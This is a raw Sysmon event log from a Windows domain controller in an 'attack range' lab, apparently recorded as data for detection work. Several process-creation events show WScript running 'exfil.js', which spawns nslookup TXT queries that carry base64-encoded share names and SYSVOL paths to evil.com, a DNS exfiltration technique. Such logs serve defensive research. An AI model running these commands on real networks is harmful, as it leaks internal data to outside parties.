14:21:44.860{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.860{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.860{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.860{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.860{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-7945-000000005F02}1908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.860{2E1864BB-18E0-629A-6742-000000005F02}39768008C:\Windows\System32\WScript.exe{2E1864BB-18F8-629A-7945-000000005F02}1908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.863{2E1864BB-18F8-629A-7945-000000005F02}1908C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlflygxo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.844{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllaf.tmpMD5=88CB44002509C6BB2D4BC0ADC4A5E028,SHA256=FA57CD8CDA118516C9A4FB97A60BCAFFDFC289CB501CF1DABE54CCC933EB8213,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.245{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51097- 354300x8000000000000000213445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.245{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51096- 354300x8000000000000000213444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.244{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51095- 10341000x8000000000000000213443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.813{2E1864BB-18F8-629A-7745-000000005F02}73282328C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-7845-000000005F02}8012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.813{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.813{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.813{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.813{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.813{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-7845-000000005F02}8012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.813{2E1864BB-18F8-629A-7645-000000005F02}16966656C:\Windows\system32\cmd.exe{2E1864BB-18F8-629A-7845-000000005F02}8012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.816{2E1864BB-18F8-629A-7845-000000005F02}8012C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F8-629A-7645-000000005F02}1696C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllaf.tmp 2>&1 10341000x8000000000000000213435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.791{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-7745-000000005F02}7328C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.791{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-7745-000000005F02}7328C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.776{2E1864BB-18F8-629A-7745-000000005F02}73282328C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-7645-000000005F02}1696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.776{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-7745-000000005F02}7328C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.760{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.760{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.760{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.760{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.760{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-7645-000000005F02}1696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.760{2E1864BB-18E0-629A-6742-000000005F02}39762800C:\Windows\System32\WScript.exe{2E1864BB-18F8-629A-7645-000000005F02}1696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.767{2E1864BB-18F8-629A-7645-000000005F02}1696C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllaf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.760{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=80916A48152EF2AEF03C60924D303457,SHA256=C2ABAF5684E4A5B7A22961289459A384B6D252235BCCCA71D9A0109A4D7B1E47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.744{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpzz.tmpMD5=CB596D298926BB7548136A14BD30FF7C,SHA256=F828C268F75B06BE1AA98CB1BF6D08702D0B68C46C1A2B67F8CB9ED67478BB62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.713{2E1864BB-18F8-629A-7445-000000005F02}57207920C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-7545-000000005F02}6372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 